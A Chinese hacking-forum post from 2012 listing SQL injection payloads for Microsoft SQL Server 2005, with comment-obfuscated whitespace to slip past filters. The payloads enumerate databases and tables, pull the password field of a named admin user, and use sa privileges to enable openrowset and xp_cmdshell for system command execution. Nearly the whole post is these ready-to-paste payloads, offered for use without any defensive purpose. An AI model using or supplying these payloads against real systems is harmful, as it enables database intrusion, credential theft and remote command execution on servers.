找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2174|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

5 b& G' o* S2 |& a& n: T% N# [  m- L5 T9 t

8 _7 Y! d/ [, ^4 d: |" r' i9 I9 I[Copy to clipboard]CODE:. [1 E  U0 {4 V' Z- K3 w: p/ Q
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
$ b# r+ h2 |2 u; A
. T" O; [7 t3 f% l9 O: g: C0 b爆表语句,somedb部份是所要列的数据库,红色数字1累加/ O& ^: J$ u6 p$ H

: N1 W5 B* z' G& x* n
0 |& U* H! v& M$ E[Copy to clipboard]CODE:$ W0 A) o4 U2 v, u1 _) R% [
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
, b2 {: x0 k8 I
7 q/ W( w" o7 D0 N0 z爆字段语句,爆表admin里user='icerover'的密码段
$ V5 w/ ^% ]2 S$ g' J* k  X' y) y8 {: U4 S

3 Q+ T# h) i7 K) M3 p7 L- w; S- {" q5 _[Copy to clipboard]CODE:
8 O3 S; l, a) e2 s* I**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--! _: L: T3 W! Y  r" a
5 n6 X! Y2 J* \) u9 w# L; J
mssql2005默认没有开xp_cmdshell的,openrowset也不能用, e2 B$ A. _6 M( D) _/ J: W5 H
如果是sa权限,可以这样来开启
6 u" s, P! c- e" y) N' @) I$ Z开启openrowset, A" V* s: I1 H2 m
  i0 q6 l7 Q4 F. |+ J# Z

" \. J/ F9 Z: V  J[Copy to clipboard]CODE:0 ~) e1 R1 N6 p1 {! W. z6 O
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
, U. S$ J4 \' }5 v. V& K/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--" H1 Z" K' }# j& U) y

' [8 x$ ^4 M6 u! k7 h# O( @开启xp_cmdshell
6 h# d5 }- P; F% Q: a' E- D1 V# y* ^2 a, b9 \) \5 p% P! M6 Z
! N% V0 R3 x5 Z$ S
[Copy to clipboard]CODE:
& p5 z9 z$ ~' _9 H( y  EEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
8 q- y3 X4 A8 b7 w* W  eEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--; J6 k. t. R' C& u! Y" O) j4 |* K
9 z) H" X. j8 }% x% V2 I% n; U
ok,over~~晚安: {, B: V- f  t. p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表